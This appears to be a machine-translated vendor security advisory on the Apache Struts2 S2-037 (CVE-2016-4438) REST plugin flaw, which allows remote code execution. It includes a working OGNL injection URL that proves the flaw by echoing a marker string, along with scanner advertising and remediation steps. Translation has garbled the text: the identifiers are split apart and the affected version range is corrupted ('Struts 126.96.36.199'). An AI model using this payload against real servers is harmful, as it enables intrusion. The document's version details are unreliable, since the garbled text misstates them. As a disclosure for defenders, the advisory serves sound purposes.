Apache Struts2 using the REST plugin the cases, the attacker uses REST calls malicious expression can be remote code execution. The vulnerability number CVE-2 0 1 6-4 4 3 8, Set Name, S2-0 3 to 7. The vulnerability and S2-0 3 3 vulnerability to trigger the process is basically the same, are in the ActionMapping in the methodName into the OGNL expression execution, leading to arbitrary code execution. You also can't quickly confirm your business is secure? WVSS and RSAS to help you quickly identify risks.
Apache Struts2 then exposed a remote code execution vulnerability, an attacker can use the REST plug-in calls a malicious expression remote code execution. This vulnerability number CVE-2 0 1 6-4 4 3 8, named S2-0 3 to 7.
Struts 2.3.20-Struts 126.96.36.199
All install the REST plugin of Struts application
http://127.0.0.1:8080/struts2-rest-showcase/orders/3//%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context%5B%23parameters. obj%5B0%5D,%5D. getWriter(),%23wr. print(%23parameters. content%5B0%5D%2b602%2b53718%2b1239876),%23wr. close(),xx. toString. json?& amp;obj=com. opensymphony. xwork2. dispatcher. HttpServletResponse&content=paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt reponse echoed paglyrwqlnvhfgfkunxucswjhpeiomqmhnmbwbccujdyfyokxexhsuqtflvt i.e., the presence of the vulnerability.
Nsfocus customers can use the green Alliance Web application vulnerability scanning systems, NSFOCUS WVSS and the green Alliance remote security assessment system(NSFOCUS RSAS)detects its own application system is the existence of vulnerabilities. The green Alliance Web application vulnerability scanning systems, NSFOCUS WVSS and the green Alliance remote security assessment system(NSFOCUS RSAS)have been in vulnerabilities were exposed for the first time within the perfect realization of the vulnerability detection capability, you can update the plug-in Library for fast, accurate and full scan found.
1 added cleanupActionName filter;
2 Using a Web application firewall, etc. securitydevices for protection;
3 attention to Apache's website and timely update to struts2. 3. 2 9: The https://struts.apache.org/
Refer to the official notice: https://cwiki.apache.org/confluence/display/WW/s2-037